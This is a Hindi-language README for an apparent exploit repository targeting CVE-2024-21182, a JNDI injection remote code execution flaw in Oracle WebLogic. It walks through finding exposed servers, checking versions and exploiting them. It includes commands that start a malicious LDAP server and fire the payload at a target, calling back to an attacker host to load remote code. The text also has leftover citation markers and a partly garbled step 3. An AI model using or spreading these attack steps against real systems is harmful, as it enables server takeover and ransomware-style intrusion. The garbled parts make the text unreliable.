
CVE-2024-21182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Oracle WebLogic Server में T3/IIOP प्रोटोकॉल के माध्यम से एक अनऑथेंटिकेटेड JNDI इंजेक्शन है जो रिमोट कोड एग्जीक्यूशन की ओर ले जाता है। परीक्षण के लिए एक Docker लैब शामिल है।
CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE
CVE-2024-21182 एक अप्रमाणित JNDI इंजेक्शन भेद्यता है जो Oracle WebLogic Server के Core घटक को प्रभावित करती है। यह एक दूरस्थ हमलावर को T3 या IIOP प्रोटोकॉल के माध्यम से सर्वर पर मनमाना कोड (RCE) निष्पादित करने की अनुमति देती है, जिससे सर्वर के सभी डेटा तक पूर्ण पहुँच प्राप्त की जा सकती है[citation:5][citation:8][citation:9]।
इस भंडार में एक कार्यात्मक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है जो AggregatableOpaqueReference + MessageDestinationReference गैजेट श्रृंखला के माध्यम से CVE-2023-21839 के पैच के सफल शोषण को प्रदर्शित करता है[citation:2][citation:4]।
| विशेषता | मान |
|---|---|
| CVE | CVE-2024-21182 |
| उत्पाद | Oracle WebLogic Server (Core) |
| प्रभावित संस्करण | 12.2.1.4.0 और 14.1.1.0.0[citation:7] |
| उपलब्ध पैच | Oracle Critical Patch Update (जुलाई 2024 और अक्टूबर 2024)[citation:6] |
| CISA KEV में स्थिति | सक्रिय शोषण की पुष्टि (01/06/2026 को जोड़ा गया)[citation:3][citation:8] |
| शमन की अंतिम तिथि (CISA) | 04/06/2026[citation:8] |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
चरण 1: पहचान: T3/IIOP पोर्ट (7001) के साथ उजागर WebLogic सर्वरों की पहचान करें।
चरण 2: विश्लेषण: निर्धारित करें कि सर्वर एक कमजोर संस्करण (12.2.1.4.0 या 14.1.1.0.0) चला रहा है या अक्टूबर 2024 के पैच से रहित है।
चरण 3: शोषण (तकनीकी प्रवाह):
AggregatableOpaqueReference ऑब्जेक्ट बनाता है[citation:2]।referent को संशोधित किया जाता है ताकि वह एक दुर्भावनापूर्ण MessageDestinationReference की ओर इंगित करे[citation:4]।wlthint3client.jar (WebLogic इंस्टॉलेशन से निकाला जा सकता है)।# 1. रिपॉजिटरी क्लोन करें
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182
# 2. प्रयोगशाला शुरू करें (पीड़ित + हमलावर)
docker-compose up -d
# 3. स्वचालित शोषण चलाएँ
./validate.sh
# 1. दुर्भावनापूर्ण LDAP/HTTP सर्वर शुरू करें
python3 exploit/ldap_server.py
# 2. दूसरे टर्मिनल में, Java पेलोड निष्पादित करें
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil
CISA के अनुसार वर्तमान स्थिति: "Known To Be Used in Ransomware Campaigns? Unknown" (लेकिन आमतौर पर हाँ, मिडलवेयर में RCE रैनसमवेयर घुसपैठ में प्रारंभिक वेक्टर होता है)।
यह कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। स्पष्ट प्राधिकरण के बिना सिस्टम के विरुद्ध इस PoC का दुरुपयोग अवैध है। लेखक इस जानकारी के दुरुपयोग के लिए जिम्मेदार नहीं है।